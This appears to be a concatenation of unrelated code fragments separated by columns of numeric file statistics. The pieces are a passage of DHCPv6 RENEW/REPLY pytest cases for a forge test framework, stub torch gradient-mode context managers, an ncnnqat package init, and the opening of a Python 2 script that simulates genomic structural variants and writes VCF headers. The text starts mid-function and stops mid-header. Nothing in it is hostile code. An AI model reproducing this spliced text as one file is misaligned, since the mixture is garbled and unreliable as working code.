    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '1')
    srv_msg.response_check_include_option('Response', None, '2')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    # Client A: REQUEST / REPLY.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    # Client B (DUID ...:22), same ia_id 666: SOLICIT / ADVERTISE.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '1')
    srv_msg.response_check_include_option('Response', None, '2')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    # Client B: REQUEST / REPLY.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    misc.test_procedure()
    # client try to renew address that is his
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('RENEW')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '1')
    srv_msg.response_check_include_option('Response', None, '2')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
    # The REPLY must carry only client B's own lease: 3000::2 renewed
    # with validlft 80, and 3000::1 must NOT appear.
    # (The previous comment here claimed "validlft 0", which did not
    # match the assertions below.)
    srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::2')
    srv_msg.response_check_suboption_content('Response', '5', '3', None, 'validlft', '80')
    srv_msg.response_check_suboption_content('Response', '5', '3', 'NOT ', 'addr', '3000::1')
    references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.renew
def test_v6_message_renew_reply_different_clients_the_same_iaid_expired():
    """Client A renews with client B's IA_NA after both leases expired.

    Same scenario as the non-expired variant, but with very short timers
    (valid-lifetime 8s) and a 10s sleep so both leases lapse before the
    RENEW is sent.
    """
    # Two clients try to renew address, using the same IA_ID but different Client-ID
    misc.test_setup()
    # Short timers so leases expire within the 10s sleep below.
    srv_control.set_time('renew-timer', '5')
    srv_control.set_time('rebind-timer', '6')
    srv_control.set_time('preferred-lifetime', '7')
    srv_control.set_time('valid-lifetime', '8')
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::2')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')

    # Client A (DUID ...:01): SOLICIT / ADVERTISE.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '1')
    srv_msg.response_check_include_option('Response', None, '2')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    # Client A: REQUEST / REPLY.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    # Client B (DUID ...:22), same ia_id 666: SOLICIT / ADVERTISE.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '1')
    srv_msg.response_check_include_option('Response', None, '2')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    # Client B: REQUEST / REPLY.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    # Let both leases (valid-lifetime 8s) expire.
    srv_msg.forge_sleep('10', 'seconds')

    # Client A sends RENEW carrying the IA_NA copied from B's REPLY.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('RENEW')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '1')
    srv_msg.response_check_include_option('Response', None, '2')
    srv_msg.response_check_include_option('Response', None, '3')
    # Fixed: this option-3/sub-option-5 check was accidentally duplicated
    # (the same call appeared twice in a row).
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
    # NOTE(review): both addresses are expected in the REPLY after
    # expiry — confirm against forge's matching semantics.
    srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::2')
    srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::1')
    references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.renew
def test_v6_message_renew_reply_different_clients_the_same_iaid_expired_2():
    """Client B renews its own (expired) lease while sharing IA_ID 666.

    Short timers (valid-lifetime 8s) plus a 10s sleep make both leases
    expire; the RENEW then uses the correct (own) IA_NA.
    """
    # Two clients try to renew address, using the same IA_ID but different Client-ID
    misc.test_setup()
    # Short timers so leases expire within the 10s sleep below.
    srv_control.set_time('renew-timer', '5')
    srv_control.set_time('rebind-timer', '6')
    srv_control.set_time('preferred-lifetime', '7')
    srv_control.set_time('valid-lifetime', '8')
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::2')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')

    # Client A (DUID ...:01): SOLICIT / ADVERTISE.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '1')
    srv_msg.response_check_include_option('Response', None, '2')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    # Client A: REQUEST / REPLY.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    # Client B (DUID ...:22), same ia_id 666: SOLICIT / ADVERTISE.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '1')
    srv_msg.response_check_include_option('Response', None, '2')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    # Client B: REQUEST / REPLY.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    # Let both leases (valid-lifetime 8s) expire.
    srv_msg.forge_sleep('10', 'seconds')

    misc.test_procedure()
    # client try to renew address that is his
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('RENEW')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '1')
    srv_msg.response_check_include_option('Response', None, '2')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
    # The REPLY must carry only client B's own lease: 3000::2 re-bound
    # with validlft 8, and 3000::1 must NOT appear.
    # (The previous comment here claimed "validlft 0", which did not
    # match the assertions below.)
    srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::2')
    srv_msg.response_check_suboption_content('Response', '5', '3', None, 'validlft', '8')
    srv_msg.response_check_suboption_content('Response', '5', '3', 'NOT ', 'addr', '3000::1')
    references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.renew
def test_v6_message_renew_reply_time_zero():
    """RENEW with an address that is no longer appropriate for the link.

    The client leases 3000::66, the server is then reconfigured to a
    different pool, the client leases a new address, and finally sends
    RENEW with the SAVED (old) IA_NA. The REPLY must return 3000::66
    with valid lifetime 0.
    """
    # Testing server ability to perform message exchange RENEW - REPLY
    # In case when we expect that address is not appropriate for the link.
    # Message details 		Client		Server
    # 						SOLICIT -->
    # 		   						<-- ADVERTISE
    # 						REQUEST -->
    # Save IA_NA with IA_Addr		<-- REPLY
    # 				Reconfigure Server
    # 						SOLICIT -->
    # 		   						<-- ADVERTISE
    # Create leases 		REQUEST -->
    # for the same client			<-- REPLY
    # Use saved IA_NA 		RENEW -->
    # (proper client ID, IA_NA, but wrong address)
    # 								<-- REPLY
    # Pass Criteria:
    # 				REPLY MUST include option:
    # 					client-id
    # 					server-id
    # 					IA-NA with suboption IA-Address with validlft set to 0.
    misc.test_setup()
    # Single-address pool: the client can only get 3000::66.
    srv_control.config_srv_subnet('3000::/64', '3000::66-3000::66')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')

    misc.test_procedure()
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    misc.test_procedure()
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
    # Keep the first lease's IA_NA for the final RENEW.
    srv_msg.client_save_option('IA_NA')

    # Reconfigure with a pool that does NOT contain 3000::66.
    misc.reconfigure()
    srv_control.config_srv_subnet('3000::/64', '3000::100-3000::155')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')

    misc.test_procedure()
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    misc.test_procedure()
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    misc.test_procedure()
    srv_msg.client_copy_option('server-id')
    # Attach the SAVED (pre-reconfigure) IA_NA instead of the current one.
    srv_msg.client_add_saved_option('DONT ')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('RENEW')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
    # The stale address must be returned with a zero valid lifetime.
    srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::66')
    srv_msg.response_check_suboption_content('Response', '5', '3', None, 'validlft', '0')
    references.references_check('RFC')
| 43.597378
| 93
| 0.705855
| 3,454
| 23,281
| 4.408512
| 0.042559
| 0.107178
| 0.111906
| 0.123531
| 0.968805
| 0.968805
| 0.968805
| 0.962369
| 0.960071
| 0.952978
| 0
| 0.036342
| 0.137193
| 23,281
| 533
| 94
| 43.679174
| 0.721711
| 0.069456
| 0
| 0.953202
| 0
| 0
| 0.200463
| 0.026833
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014778
| true
| 0.068966
| 0.012315
| 0
| 0.027094
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
5464ce9d7c69e701634f2888b73b8ea0477483b3
| 333
|
py
|
Python
|
packages/pytea/pylib/torch/autograd/grad_mode.py
|
Sehun0819/pytea
|
3f068016a71a1915722e51d977fedab01427a42c
|
[
"MIT"
] | 241
|
2021-03-19T01:11:44.000Z
|
2022-03-25T03:15:22.000Z
|
packages/pytea/pylib/torch/autograd/grad_mode.py
|
Sehun0819/pytea
|
3f068016a71a1915722e51d977fedab01427a42c
|
[
"MIT"
] | 2
|
2021-02-26T08:16:04.000Z
|
2022-02-28T02:52:58.000Z
|
packages/pytea/pylib/torch/autograd/grad_mode.py
|
Sehun0819/pytea
|
3f068016a71a1915722e51d977fedab01427a42c
|
[
"MIT"
] | 14
|
2021-01-08T02:22:58.000Z
|
2022-01-19T14:13:14.000Z
|
class no_grad:
    """Stub of ``torch.autograd.no_grad`` for static analysis.

    Acts as both a context manager and a (no-op) decorator: entering
    yields None, exiting reports the exception as handled (returns True),
    and calling the instance on a function returns the instance itself.
    """

    def __enter__(self):
        # Nothing is bound by ``with no_grad() as x`` — x is None.
        return None

    def __exit__(self, *args):
        # True → any exception raised inside the block is suppressed.
        return True

    def __call__(self, func):
        # Decorator usage: the instance stands in for the function.
        return self
class enable_grad:
    """Stub of ``torch.autograd.enable_grad`` for static analysis.

    Mirrors the ``no_grad`` stub: a context manager whose ``__enter__``
    yields None and whose ``__exit__`` returns True (suppressing
    exceptions), and a decorator that returns the instance unchanged.
    """

    def __enter__(self):
        # Nothing is bound by ``with enable_grad() as x`` — x is None.
        return None

    def __exit__(self, *args):
        # True → any exception raised inside the block is suppressed.
        return True

    def __call__(self, func):
        # Decorator usage: the instance stands in for the function.
        return self
| 15.136364
| 30
| 0.588589
| 40
| 333
| 4.25
| 0.35
| 0.082353
| 0.141176
| 0.188235
| 0.894118
| 0.894118
| 0.894118
| 0.894118
| 0.894118
| 0.894118
| 0
| 0
| 0.333333
| 333
| 21
| 31
| 15.857143
| 0.765766
| 0
| 0
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0
| 0.428571
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 10
|
54952a4a8faa64c84f2f6f50d8e4e3a7d7f489d4
| 277
|
py
|
Python
|
ncnnqat/__init__.py
|
shenmayufei/ncnnqat
|
0a514665414d2f5856467e95989db7de7633b14d
|
[
"MIT"
] | 59
|
2021-06-22T13:43:50.000Z
|
2022-03-30T03:28:10.000Z
|
ncnnqat/__init__.py
|
shenmayufei/ncnnqat
|
0a514665414d2f5856467e95989db7de7633b14d
|
[
"MIT"
] | null | null | null |
ncnnqat/__init__.py
|
shenmayufei/ncnnqat
|
0a514665414d2f5856467e95989db7de7633b14d
|
[
"MIT"
] | 9
|
2021-06-22T14:36:14.000Z
|
2021-11-08T03:37:49.000Z
|
"""ncnnqat package entry point: re-export the public quantization API."""
import sys

# Fixed: the previous ``try: ... except: raise`` around this import was a
# no-op (a bare re-raise adds nothing) and used a disallowed bare except.
from .quantize import (
    unquant_weight,
    freeze_bn,
    merge_freeze_bn,
    register_quantization_hook,
    save_table,
)

# Explicit public API of the package.
__all__ = [
    "unquant_weight",
    "freeze_bn",
    "merge_freeze_bn",
    "register_quantization_hook",
    "save_table",
]
| 25.181818
| 62
| 0.707581
| 33
| 277
| 5.393939
| 0.545455
| 0.179775
| 0.213483
| 0.235955
| 0.752809
| 0.752809
| 0.752809
| 0.752809
| 0.752809
| 0.752809
| 0
| 0
| 0.198556
| 277
| 10
| 63
| 27.7
| 0.801802
| 0
| 0
| 0
| 0
| 0
| 0.268116
| 0.094203
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.222222
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54b73d4492f7b5357d54e5870dd217f28ae6f560
| 152,415
|
py
|
Python
|
Support.Scripts/Produce.Simulated.FussyJuncs.py
|
mills-lab/svelter
|
d318b06d588483fe8a8ebcac8c8a6c7878f2c2b3
|
[
"MIT"
] | 21
|
2015-11-02T06:31:52.000Z
|
2021-12-20T03:14:04.000Z
|
Support.Scripts/Produce.Simulated.FussyJuncs.py
|
mills-lab/svelter
|
d318b06d588483fe8a8ebcac8c8a6c7878f2c2b3
|
[
"MIT"
] | 14
|
2016-03-02T21:12:53.000Z
|
2019-08-02T20:01:02.000Z
|
Support.Scripts/Produce.Simulated.FussyJuncs.py
|
mills-lab/svelter
|
d318b06d588483fe8a8ebcac8c8a6c7878f2c2b3
|
[
"MIT"
] | 6
|
2015-08-19T18:33:02.000Z
|
2017-05-16T03:42:57.000Z
|
#!/usr/bin/env python
#!python
#command='Produce.Simulated.FussyJuncs.py heterozygous --reference /mnt/EXT/Mills-scratch2/reference/GRCh37/human_g1k_v37.fasta --input-sim /mnt/EXT/Mills-scratch2/Xuefang/Simulate.FussyJunc/Simulate.het.rerun.test.20150901/het.sim --output-prefix /mnt/EXT/Mills-scratch2/Xuefang/Simulate.FussyJunc/Simulate.het.rerun.test.20150901/het'
#sys.argv=command.split()
import os
import sys
import getopt
import re
import pickle
import time
import datetime
import random
import numpy
import glob
import numpy as np
from scipy.stats import scoreatpercentile
script_name=sys.argv[0]
if len(sys.argv)<2:
print 'Produce.Simulated.FussyJuncs.py Last Update:2015-08-20'
print ''
print 'this script is used to randomly simulate simple/complex SVs and form a corresponding altered reference genome'
print ''
print 'Usage:'
print 'Produce.Simulated.FussyJuncs.py [options] <parameters>'
print ' '
print 'Options:'
print 'heterozygous: simulate simple heterozygous SVs'
print 'homozygous: simulate simple homozygous SVs'
print 'complex: simulate complex SVs'
print ' '
print 'Parameters:'
print '--reference: reference genme'
print '--input-sim: input sim format,see example'
print '--input-rec: input rec format, specially designed for complex events,see example'
print '--output-prefix: prefix of output files'
else:
function_name=sys.argv[1]
def insert_read_decide(bp_list):
    # Decide what sequence (if any) to insert at a breakpoint.
    # Class I (~71%): no insertion. Class II (~29%): a micro-insertion or
    # a longer sequence taken from a donor chromosome pool.
    # bp_list[0] is the chromosome name of the breakpoint.
    class_roll = random.choice(range(100))
    if not class_roll > 70:
        # Class I: no inserted sequence.
        return ''
    sub_roll = random.choice(range(100))
    if sub_roll < 60:
        # 60% of Class II: 2-20bp micro-insertion of random bases.
        return produce_random_seqs(random.choice(range(2, 20)))
    # Remaining 40%: insertion longer than 20bp.
    size_roll = random.choice(range(100))
    if size_roll < 25:
        # 25%: 20-50bp of random bases.
        return produce_random_seqs(random.choice(range(20, 50)))
    if size_roll < 50:
        # 25%: 20-50bp sequence drawn from ANOTHER chromosome's pool.
        donors = [chrom for chrom in seq_ins_pools.keys() if not chrom == bp_list[0]]
        return random.choice(seq_ins_pools[random.choice(donors)])
    # 50%: sequence drawn from the SAME chromosome's pool, when present.
    if bp_list[0] in seq_ins_pools.keys():
        return random.choice(seq_ins_pools[bp_list[0]])
    return ''
if function_name=='heterozygous':
def sv_rec_2(sv_info):
    # Walk every (reference structure k1ab, alternative structure k2ab)
    # pair in sv_info and record the structural difference of each
    # haplotype via simple_flag_SA / add_csv_info (defined elsewhere).
    # Keys look like 'abc/abc'; the part before '/' is haplotype a, the
    # part after is haplotype b.
    for k1ab in sorted(sv_info.keys()):
        for k2ab in sv_info[k1ab].keys():
            if not k2ab==k1ab:
                k1aba=k1ab.split('/')[0]          # reference haplotype a
                k2aba=k2ab.split('/')[0]          # alternative haplotype a
                k2abb=k2ab.split('/')[1]          # alternative haplotype b
                flaga=[]
                flagb=[]
                test=[[],[]]
                # Haplotype a changed: classify the rearrangement.
                if flaga==[] and not k1aba==k2aba:
                    if k2aba=='':
                        # Whole haplotype deleted: emit reference blocks as-is.
                        csv1=[[i for i in k1aba],[],[],0]
                    else:
                        csv1=simple_flag_SA(k1aba,k2aba)
                    add_csv_info(csv1,1,k1ab,k2ab)
                # Haplotype b changed: same classification against k1aba.
                if flagb==[] and not k1aba==k2abb:
                    if k2abb=='':
                        # NOTE(review): this builds csv1 from k2abb, which is
                        # empty in this branch — the parallel branch above uses
                        # k1aba instead. Possible copy/paste slip; confirm
                        # intended behavior before changing.
                        csv1=[[i for i in k2abb],[],[],0]
                    else:
                        csv1=simple_flag_SA(k1aba,k2abb)
                    add_csv_info(csv1,2,k1ab,k2ab)
score_Cff=-20
def hash_reorder():
    """Reformat the collected SV calls (globals del1/inv1/dup1/tra1) into
    VCF-style rows grouped into the global sv_out as
    sv_out[chrom][event_id] = [row, ...].

    Scores below the global score_Cff are flagged 'LowQual'.  REF is left as
    the placeholder 'N' and resolved later (see write_VCF_main).
    """
    # zygosity tag -> VCF GT; an unexpected tag now raises KeyError instead of
    # silently reusing the previous record's genotype as the original did
    geno_map={'heta':'1|0','hetb':'0|1','homo':'1|1'}
    # DEL and INV records share the same layout:
    # [start, end, zygosity, score, ..., event_id]
    for sv_rec,alt_sym,sv_type in [(del1,'<DEL>','DEL'),(inv1,'<INV>','INV')]:
        for ka1 in sv_rec.keys():
            if not ka1 in sv_out.keys():
                sv_out[ka1]={}
            for ka2 in sv_rec[ka1]:
                REF_AL='N'  # placeholder; real base filled in at output time
                Pass_Sign='LowQual' if ka2[3]<score_Cff else 'PASS'
                GenoType=geno_map[ka2[2]]
                ka_new=[ka1,ka2[0],ka2[-1],REF_AL,alt_sym,ka2[3],Pass_Sign,'SVTYPE='+sv_type+';END='+str(ka2[1]),'GT',GenoType]
                if not ka2[-1] in sv_out[ka1].keys():
                    sv_out[ka1][ka2[-1]]=[]
                if not ka_new in sv_out[ka1][ka2[-1]]:
                    sv_out[ka1][ka2[-1]].append(ka_new)
    # DUP records additionally carry a copy number in the last slot, with the
    # event id one slot earlier (index -2)
    for ka1 in dup1.keys():
        if not ka1 in sv_out.keys():
            sv_out[ka1]={}
        for ka2 in dup1[ka1]:
            REF_AL='N'
            CopyNumber=str(ka2[-1])
            Pass_Sign='LowQual' if ka2[3]<score_Cff else 'PASS'
            GenoType=geno_map[ka2[2]]
            ka_new=[ka1,ka2[0],ka2[-2],REF_AL,'<DUP>',ka2[3],Pass_Sign,'SVTYPE=DUP;END='+str(ka2[1]),'GT:CN',GenoType+':'+CopyNumber]
            if not ka2[-2] in sv_out[ka1].keys():
                sv_out[ka1][ka2[-2]]=[]
            if not ka_new in sv_out[ka1][ka2[-2]]:
                sv_out[ka1][ka2[-2]].append(ka_new)
    # TRA records are keyed '<chrom>_..._<score>' and hold per-allele
    # ('a'/'b') lists of breakend rows
    for ka1 in tra1.keys():
        ks1=ka1.split('_')[0]
        ks2='_'.join(ka1.split('_')[:-1])
        SV_Score=float(ka1.split('_')[-1])
        Pass_Sign='LowQual' if SV_Score<score_Cff else 'PASS'
        if not ks1 in sv_out.keys():
            sv_out[ks1]={}
        if not ks2 in sv_out[ks1].keys():
            sv_out[ks1][ks2]=[]
        for ka2 in tra1[ka1].keys():
            # BUGFIX: the original assigned 'Genotype' (typo) for allele 'b',
            # so allele-b rows silently reused allele-a's GT
            GenoType={'a':'1|0','b':'0|1'}[ka2]
            for ka3 in tra1[ka1][ka2]:
                ka_new=ka3[:2]+[ks2,ka3[2]]+ka3[3:]+[SV_Score,Pass_Sign,'SVTYPE=TRA','GT',GenoType]
                if not ka_new in sv_out[ks1][ks2]:
                    sv_out[ks1][ks2].append(ka_new)
def write_VCF_header(output_file):
fo=open(output_file,'w')
print output_file
print>>fo, '##fileformat=VCFv4.1'
print>>fo,'##fileDate='+time.strftime("%Y%m%d")
print>>fo,'##reference=hg19'
print>>fo,'##INFO=<ID=BKPTID,Number=.,Type=String,Description="ID of the assembled alternate allele in the assembly file">'
print>>fo,'##INFO=<ID=CIEND,Number=2,Type=Integer,Description="Confidence interval around END for imprecise variants">'
print>>fo,'##INFO=<ID=CIPOS,Number=2,Type=Integer,Description="Confidence interval around POS for imprecise variants">'
print>>fo,'##INFO=<ID=END,Number=1,Type=Integer,Description="End position of the variant described in this record">'
print>>fo,'##INFO=<ID=HOMLEN,Number=.,Type=Integer,Description="Length of base pair identical micro-homology at event breakpoints">'
print>>fo,'##INFO=<ID=HOMSEQ,Number=.,Type=String,Description="Sequence of base pair identical micro-homology at event breakpoints">'
